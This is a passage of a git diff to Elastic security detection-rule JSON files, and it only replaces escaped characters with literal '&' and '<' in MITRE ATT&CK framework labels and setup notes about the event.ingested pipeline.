"framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_105.json b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_105.json index beb878065df..81bed5f974c 100644 --- a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_105.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "0564fb9d-90b9-4234-a411-82a546dc1343", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_106.json b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_106.json index 6385c5dd257..1c9ebc7afe7 100644 --- a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_106.json +++ b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_106.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "0564fb9d-90b9-4234-a411-82a546dc1343", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_107.json b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_107.json index 71a650cc9ce..1678d92dc1e 100644 --- a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_107.json +++ b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_107.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "0564fb9d-90b9-4234-a411-82a546dc1343", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_104.json b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_104.json index 2b95e4877db..7d7f44aa1db 100644 --- a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_104.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_105.json b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_105.json index f08eb646c3b..8a694e0e323 100644 --- a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_105.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_106.json b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_106.json index f7b53febe61..e7dc9cd1850 100644 --- a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_106.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_107.json b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_107.json index 4fe5d12eeba..769108db766 100644 --- a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_107.json +++ b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_107.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_108.json b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_108.json index 81492c3b844..d3563a00353 100644 --- a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_108.json +++ b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_108.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_1.json b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_1.json index aabae3f733e..ff63adad472 100644 --- a/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_1.json +++ b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_1.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_2.json b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_2.json index 4e8742371b8..70ba5dbff07 100644 --- a/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_2.json +++ b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_2.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_103.json b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_103.json index d6aadc55488..45897db3203 100644 --- a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_103.json +++ b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_104.json b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_104.json index 4a1d1da03bc..b47de31541f 100644 --- a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_104.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_105.json b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_105.json index b3e8ebd73da..b1b5469afb0 100644 --- a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_105.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_106.json b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_106.json index bf2d63301e6..715d8870e48 100644 --- a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_106.json +++ b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_106.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_107.json b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_107.json index cccb9bc3912..c9279b5376c 100644 --- a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_107.json +++ b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_107.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_105.json b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_105.json index e3fa4863254..61c736d1c2c 100644 --- a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_105.json @@ -60,7 +60,7 @@ ], "risk_score": 21, "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_106.json b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_106.json index 3422c8ed55d..e743fa55d0a 100644 --- a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_106.json @@ -60,7 +60,7 @@ ], "risk_score": 21, "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_107.json b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_107.json index 20b9b7b0093..33317f0df52 100644 --- a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_107.json @@ -60,7 +60,7 @@ ], "risk_score": 21, "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_108.json b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_108.json index 0716a3da5f4..34e1abbc3c0 100644 --- a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_108.json +++ b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_108.json @@ -60,7 +60,7 @@ ], "risk_score": 21, "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_109.json b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_109.json index 3f3a4923af1..2d84d639121 100644 --- a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_109.json +++ b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_109.json @@ -61,7 +61,7 @@ ], "risk_score": 21, "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_110.json b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_110.json index 41687c8587c..7bd4c9be67f 100644 --- a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_110.json +++ b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_110.json @@ -61,7 +61,7 @@ ], "risk_score": 21, "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_2.json b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_2.json index ffad3f3de8f..4e10e5e8e0f 100644 --- a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_2.json +++ b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_2.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_3.json b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_3.json index 8c01a723806..05ce1ffc265 100644 --- a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_3.json +++ b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_3.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_4.json b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_4.json index d07984573d2..dd005d8d1ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_4.json +++ b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_4.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_5.json b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_5.json index 0dfc2539e0c..9c79e75d8aa 100644 --- a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_5.json +++ b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_5.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0678bc9c-b71a-433b-87e6-2f664b6b3131_1.json b/packages/security_detection_engine/kibana/security_rule/0678bc9c-b71a-433b-87e6-2f664b6b3131_1.json index 4d47fc8b7d3..bfe44dc1bbd 100644 --- a/packages/security_detection_engine/kibana/security_rule/0678bc9c-b71a-433b-87e6-2f664b6b3131_1.json +++ b/packages/security_detection_engine/kibana/security_rule/0678bc9c-b71a-433b-87e6-2f664b6b3131_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_2.json b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_2.json index 152dea4df11..3435db47c37 100644 --- a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_2.json +++ b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_2.json @@ -62,7 +62,7 @@ ], "risk_score": 21, "rule_id": "06a7a03c-c735-47a6-a313-51c354aef6c3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_3.json b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_3.json index 87ae857fe60..1526a53d712 100644 --- a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_3.json +++ b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_3.json @@ -62,7 +62,7 @@ ], "risk_score": 21, "rule_id": "06a7a03c-c735-47a6-a313-51c354aef6c3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_4.json b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_4.json index 83d602c92fc..9343b2dd18e 100644 --- a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_4.json +++ 